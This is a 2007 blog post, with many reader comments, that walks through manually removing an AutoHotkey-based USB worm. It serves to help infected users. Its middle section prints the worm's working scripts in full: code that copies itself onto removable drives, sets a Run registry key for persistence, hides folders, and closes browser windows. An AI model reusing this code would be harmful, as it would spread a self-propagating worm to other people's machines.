May 16, 2007
w32.USBWorm lets remove this worm manually
Yesterday, my friend Vinay gave me a usb disk and asked me to copy some movies and music into the disk. I took it home and plugged the USB into my system and scanned it with nod32. I detected some viruses which it removed successfully, least I knew that there was another worm which didn’t get detected and it was in to infect my system. I double clicked the USB drive and nothing happened. Hmm strange.. I right clicked and opened the USB drive and found there was no content. Autoplay appears only if there is a Autorun.inf file present in the root of the drive. I didn’t care it much and closed the window to copy data into the drive later.
I wanted to check my mail so ran my beloved browser Firefox, it opened and with in couple of seconds a message box popped up which said ” “I DNT HATE MOZILLA BUT USE IE OR ELSE…” and the header read “USE INTERNET EXPLORER YOU DOPE.” I was like what? It also terminated Firefox 
. This is when I remembered the Autoplay option in the usb drive. This is when I had to open Internet Explorer and Google this text and found the worm name is w32.USBWorm (it was now obvious). Next step was to search for a Removal Tool and to my amazement there was none available!! Nor I could find any information on how to remove it. I decided to give myself a try to remove this worm. I tried opening orkut and Bang another surprise. This is the message it popped up ” ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did?? ” now this is pissing me off. Now, i had no other option but to remove this worm from my system. I pressed ctrl+alt+del and found nothing suspesious there .
Lets see what this worm does
It runs a exe file which is name MicrosoftPowerpoint.exe which is located in the USB disk. The autorun.inf runs this file when double clicked. Once this program is run you are infected. It hides all your hidden folders, runs the process in the memory, makes the worm to start with windows and pops those annoying messages. This worm doesn’t destroy any system files. It just infects other USB drives and spreads to new hosts.
It’s time to KO the Worm
I have PE Tools installed in my PC i ran to find out the running process. I went through all the process and found out that svchost.exe was the one responsible for it. Where PE tools helped me was, svchost.exe was running from a location C:\heap41a . So this is where the worm resides, hmm interesting now deleting the folder would do our task. But it was not so easy, as I terminated this process svchost.exe from the process list it would start again. So I had to boot my XP in safe mode. Why in safe mode is because in safe mode windows loads only the minimum required drivers and doesn’t load any user process, so this means the worm is not started with the windows. Now I searched the folder C:\heap41b but it was hidden. I went to Tools>folder option and select Show all files and folders and pressed ok. I refreshed the c:\ only to find that it won’t show any hidden folders. I again went to the Tools>folder and found the setting of Show all files and folders was reseted. Now how do I see the content, what I did was went to windows search and in advanced option I gave search hidden files and folders and gave svchost.exe as the search keyword. Bang it searched it, so I opened the folder to find out this file was not alone, the other files in this Folder were [offspring], 2.mp3, Icon.ico, reproduce.txt, svchost.exe, drivelist.txt, script1.txt, std.txt . Lets see the content of these text files.
[offspring] – Blank Folder
2.mp3 – A laughing sound
Icon.ico – A blank Icon file
reproduce.txt
#notrayicon
#persistent
ArrayCount = 0
Loop, Read,C:\heap41a\driveList.txt
{
ArrayCount += 1
Array%ArrayCount% := A_LoopReadLine
}
dat1=%userprofile%
settimer,reproduce,5000
returnreproduce:
Loop %ArrayCount%
{element := Array%A_Index%
driveget,data,Type,%element%:\
ifequal,data,Removable
{
driveget,data1,status,%element%:\
ifequal,data1,Ready
{
FileCopydir,C:\heap41a\offspring,%element%:\,1}
}
}
regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon
ifnotequal,regdata,C:\heap41a\svchost.exe C:\heap41a\std.txt
Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon,C:\heap41a\svchost.exe C:\heap41a\std.txt
return
svchost.exe
This is the file that is the culprit. The file responsible for all the annoying pop ups
script1.txt
#persistent
#notrayicon
settimer,ban,2000
returnban:
WinGetActiveTitle, ed
ifinstring,ed,orkut
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,youtube
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,Mozilla Firefox
{
winclose %ed%
msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA BUT USE IE `r OR ELSE…,30
return
}
ifwinactive ahk_class IEFrame
{ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}}
return
std.txt
#notrayicon
#singleinstance,ignore
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,2
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,2
Run C:\heap41a\svchost.exe C:\heap41a\script1.txt
Run C:\heap41a\svchost.exe C:\heap41a\reproduce.txt
These files gave away all that this worm does, after reading the script I found out that this worm also hates Youtube lol.. Most important information it gave was the Registery Keys it modified.
These are the keys that were responsible for the hidden folder problem I faced earlier
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\
CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,2
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,2
Now to rectify this go to Start Menu>Run and type regedit . In the Registry Editor browse to this entry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL and in the “Checked all” key reset it back to 1 from 2. Now you can change the settings in the folders option. Now delete the folder C:\heap41a and clear all the key entries from this registry entry HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\
CurrentVersion\policies\Explorer\Run which says heap41a.
Now the virus infection is removed 100%. Before you are done make sure you format the usb drive it doesn’t infect other systems too.
All the best. Untill a tool is out for this worm, you can follow this method to remove w32.USBWorm.
Written by: Allwin Samuel Jeba
Filed Under: Personal
Tags: Remove USB Virus, Virus
Trackback URL: http://www.jeba.in/posts/w32usbworm-lets-remove-this-worm-manually/trackback/
Sweet Sri...
September 26, 2007 at 5:08 pm
Hai.. thnx for the help … its been the big problem with orkut … thnx allot for ur help…
Dagny
September 26, 2007 at 5:31 pm
hey i tried formatting my drive, but seems like the worm isn’t cleaned out yet, cos some anti-virus softwares still detect the MicrosoftPowerPoint.exe in my pen drive
Rahul
September 27, 2007 at 8:04 am
hi,
You can also type C:/heap41a in address bar while running in safe mode or delete svchost.exe by DOS prompt.
Thanks.
audioguru
September 27, 2007 at 10:36 am
My AV never let this worm get far enough to disrupt any programs, but I had been trying to figure out how to get rid of that flash disk file for some time now. Thanks for the helpful post!
Sweet Sri...
September 27, 2007 at 6:14 pm
Hi all thnx for all ur feedbacks….
Friends this really works.. i am really happy that finally i am out of the orkut blocker…Thnx to Allwin Samuel Jeba . Really helped me allot…
aam_scorpio@rediff.com
October 2, 2007 at 1:58 am
thnx a lot alwin for this site
i tried a lot to remove this w32.usbworm but it wouldn’t come off and finally i got ur site n was able to remove it.
N million thanks to “Susmita” – with out her help i could not have access to registry in my comp to remove that file..ha i am relaved now.
Thanks to ur site : http://filehippo.com/download_hijackthis/
kasyapa malladi
October 3, 2007 at 6:50 am
thanks a lot this was frying my brain frm long time
thanx for solution
chandrika
October 4, 2007 at 2:10 am
hey,
GOD bles u yaar……..
u r a life saviour.
thanx a lot…..
but tel me 1 thing
u posted this on 16th may.
and my laptop was affected last week, say around 25th september.
how come no tool no tool is available for such a long time ??
didnt any1 discover this worm ??
Phoenix
October 9, 2007 at 7:10 pm
All that is fine.. You can remove the virus/worm from the system, but my question is, can you stop it from entering the system at all.
“Prevention is better than cure…. wat say??
MADDY
October 16, 2007 at 1:22 am
I found this as an interesting solution but when I thought to change the value of ‘Checked All’ to 1, to my surprise, there was no such parameter at all in that Registr Directory!! I thought for a while and went on to rstore my system to an earlier date.
AND IT WORKED!!! No worm now!! Isnt this a simple solution for an ameteur?!
anish
October 16, 2007 at 12:17 pm
hello my dear deja,
i’m really happy for using ur tool, thank u
really thanks for u
abhith
October 21, 2007 at 4:32 am
hey…. dats one amazin stuff u’ve shown all of u bro….. u da man…. take a bow….:)
pradeep kandpal
October 22, 2007 at 6:17 am
hi iam pradeep in my pc when iam opening command prompt & regedit my computer restart automatically please me & email me the solution.
Akshay
October 22, 2007 at 7:24 am
Thnks a lot..really its fantastic..
Vinay
October 31, 2007 at 6:38 pm
thnks a lot dude..
btw after restarting my computer..there wuz this box asking to create some txt file that i deleted earlier..i clicked on no..coz i dint want all tht mess again..will it threathen my computer?
vinayak
November 7, 2007 at 11:41 am
how can i edit svchost.exe .this is a autohotkey program
vinayak
November 7, 2007 at 11:45 am
%temp% folder ull find a microsoftpowerpoint folder del that folder
manan00
November 9, 2007 at 5:35 pm
Thanks a lott dude
I appreciate u doin this gr88 job
Dude i want 1 more thing frm u
Trojan horse is one more thing i wanted to know inside out…..
pls help me out in it…
Ayan
November 14, 2007 at 2:53 pm
Pretty good research you have done here….. but guess what i did it much earlier…. i still wanted to check if i missed anything….. thanks for the confirmation
vikrantr
November 20, 2007 at 12:31 pm
Hey, Thanks for the Help A Lot. It did solve a major problem I faced.
Keep up the good work
dr0pped
December 9, 2007 at 10:54 pm
hello guys!
I already delete heap41 and svchost but still my desktop is not running perfectly. In my windows booting this message will appear “Surabaya in my birthday
Don’t kill me, i’m just send message from your computer
Terima kasih telah menemaniku walaupun hanya sesaat, tapi bagiku sangat berarti
Maafkan jika kebahagiaan yang kuminta adalah teman sepanjang hidupku
Seharusnya aku mengerti bahwa keberadaanku bukanlah disisimu, hanyalah lamunan dalam sesal
Untuk kekasih yang tak kan pernah kumiliki 3r1k1m0″. And if i right click my folders; test, configure and install are appearing. Supposed to be it is open or explore. Then still there is no show hidden folders.
Help me please guys!!
thanks!
Sergio
December 24, 2007 at 4:22 pm
Thanks it helped a lot
Vidur
December 25, 2007 at 2:57 pm
hello Allwin
i have the same problem as ganesh.the registry editor isnt showing checked all value…instead its showing checked value(0) default value (2) which one should i change…plz help
Vidur
Ranjan Kuamar Ojha
December 28, 2007 at 3:52 pm
Hi,
I am Ranjan kumar ojha , final year student of IIIT Allahabad. Thax for ur blog about mozilla. I think, u r gineus. I also want to fight against virus. But I don’t know where to start. would like to guide me??
thanx again
Sandeep Baynes
January 7, 2008 at 1:40 am
well… if your not so familiar with the registy…. and if your registry has been locked…. you can download a tool called rrt.exe to remove restrictions. it enables registry and all other restrictions. then after you remove restrictions, you can continue with the work….. the orkut virus also locks the registry sometimes…
Sandeep Baynes
January 7, 2008 at 1:43 am
hey… and also dont forget to delete all files with the name heap in the registry…
slimshady23x7
January 10, 2008 at 2:21 pm
Hey dude! I hope this worksbut..there’s 1 problem…I can’t run task manager. When I press alt+ctrl+del the task manager appears for a second or 2 & then disappears. Please try & help me. Thank You
freddyvj
January 25, 2008 at 11:44 am
Hey Jeba
thank you,
but still i cannot view the hidden files and folders after doing all these. what can i do further
Allwin Samuel Jeba
February 2, 2008 at 2:08 pm
Try to search for the folder in c:\windows\temp .
xGuiNHOX
February 24, 2008 at 6:53 am
You dont need format your USB drive, just open your Zip File Manager (WinRar for example) and open your USB drive, you will see right there MicrosoftPowerPoint.exe a SFX file, just delete it
good luck for all
kisses BRAZIL
Sagar Rao
May 21, 2008 at 11:21 am
hello guys!
In my windows booting this message will appear “Surabaya in my birthday
Don’t kill me, i’m just send message from your computer
Terima kasih telah menemaniku walaupun hanya sesaat, tapi bagiku sangat berarti
Maafkan jika kebahagiaan yang kuminta adalah teman sepanjang hidupku
Seharusnya aku mengerti bahwa keberadaanku bukanlah disisimu, hanyalah lamunan dalam sesal
Untuk kekasih yang tak kan pernah kumiliki 3r1k1m0?.
And it’s not showing any folder in my c, d drive if i right click my folders; test, configure and install are appearing. Supposed to be it is open or explore. Then still there is no show hidden folders. now i can login windows but it won’t allow to go inside repeatedly it will PopUP virus message i.e “Surabaya in my birthday” and it will ask relogin.
Help me please guys!!
thanks!
alpachino18
June 13, 2008 at 9:12 am
WELL CAN NE1 HELP ME OUT..EVEN ME FACING THE SAME PROBLEM…BUT MA FIRST PROB IS DAT M NT ABLE TO O[EN THE TASK MANAGER ONLY…ITS APPEARS FOR A SECOND AND AGAIN DISAPPEARS….SO I CANT START ONLY ..ie WIHTOOUT OPENING THE TASK MANAGER M NOT ABLE TO DELETE THE svchost.exe FILE…PLS GUYS HELP ME OUT……..PLSSS
abhijeet
June 15, 2008 at 1:30 pm
i have not found any folder heap41a or heap* in my c:, so i cant proceed further, is that folder created anywhere else with different name, i am able to search hidden folder but not specified by you, please help us with this issue.
thnx
abhijeet
priyanka
June 29, 2008 at 2:02 pm
thank you so much jeba…i was really frustrated with that worm….i am so very grateful to you..
bless you
Alpesh
July 3, 2008 at 12:01 pm
Orkut is banned, dont try to open it, since it is restricted!!!
Posted on May 5, 2008 12:45:47 PM | Filed under: Uncategorized
Yesterday one of my friends called me up and told me that he cannot open any of the files in his Pen drive and was getting a message something related to ’system.exe’,
Firstly I thought there could be some bad sectors in his drive so I told him to bring his drive to my home so that I could check it out.
When I inserted the drive into my laptop, the message popped up in my system also, I cant recall the message but I can tell u that it was for the file ’system.exe’ and below it there were two buttons ‘yes’ and ‘no’, accidently I clicked the yes button and then my system restarted.
On the restart I came to know that my antivirus was disabled, then I tried to open the task manager but it also appeared for only 2-3 seconds. Then I came to know that my system is affected with a virus and my first guess was W32.USBWorm.
Ok I wont go into the details now and will tell u the virus symptoms and how to remove it.
Symptoms:
1) The Task manager shows up for 2-3 sec and then the message comes “—SORRY— –SAM–”.
2) When u try to access orkut then the message “Orkut is banned, don’t try to open it since it is restricted!!!” is displayed.
3) You cannot search anything related to the virus as the message “Obscene sites banned” or something like that is displayed.
4) You cannot unzip or extract any zipped files.
5) Most important one is that it also disables any antivirus.
6) You wont be able to open 80% of your software, there would be some or the other error.
Actually I could find out only these symptoms, there could be more of them.
Removal Instructions:
1) Restart the computer in Safe Mode by pressing F8 key during the restart and then selecting Safe Mode from the list.
2) Open the drive in which Windows is installed, in most cases it is “C:”.
3) Go to Tools > Folder Options > View, search for the Radio button “Show hidden Files and Folders”, check it. Just below it there is a check box “Hide Protected Operating System Files”, uncheck it.
4) Now in the ‘C:’ drive you will see a folder named “Config”, simply delete that folder.
5) Now Open the registry editor by typing ‘regedit’ in the run dialog box.
6) Go to the following Key :
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run], delete the key whose path is something like this “C:\config\system.exe”
And another edit, just do the above action with the below mentioned key also
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies]
7) Restart the computer and you are done.
Onesimus
July 4, 2008 at 7:59 am
Hi Jeba,
. Thanks for the info you have given. I am goin to try this now. Thanks a lot anyways. God bless you abundantly. Take care.
Greetings mate. Nice blog. I have seen many people face this problem with this worm with all those annoying messages
ADS
July 7, 2008 at 5:22 pm
Can u please throw some info on the below mentioned virus. My Kaspersky says deleted. Will I have to do anything more?
Virus.Win32.Hidrag.a
arushi
July 9, 2008 at 11:42 am
thanx a tonnn 4 such a detailed xplanation…..i ws searching 4 1 y dis
bhise
July 20, 2008 at 5:11 pm
Can any halp in removing this virus
Surabaya in my birthday
Don’t kill me, i’m just send message from your computer
Terima kasih telah menemaniku walaupun hanya sesaat, tapi bagiku sangat berarti
Maafkan jika kebahagiaan yang kuminta adalah teman sepanjang hidupku
Seharusnya aku mengerti bahwa keberadaanku bukanlah disisimu, hanyalah lamunan dalam sesal
Untuk kekasih yang tak kan pernah kumiliki 3r1k1m0
eldhose
July 28, 2008 at 4:27 am
thank u … man
Pranesh
July 31, 2008 at 5:58 am
Thks a lot …
U ll be remembered by many for ur help !!!
Ashoka BL
December 14, 2008 at 5:45 am
Hi Guyz,
its really awesome worm…took almost 2 hours for me to figure out, somehow using advanced search i got the location of microsoftpowerpoint.exe i deleted the folder but still i was getting the same error. I was able to see all the hidden folders but not the heap41a,i was going mad…and then thought lemme try with command prompt, and banggg….i found the folder in c:\, i deleted all the files and then deleted the folder and here i am happily got into orkut.
one suggestion, when u guyz use the thumb drive dont have an autorun option.
Thanks pals, and thanks Jeba u rock.
Regards,
Ashoka BL
Bangalore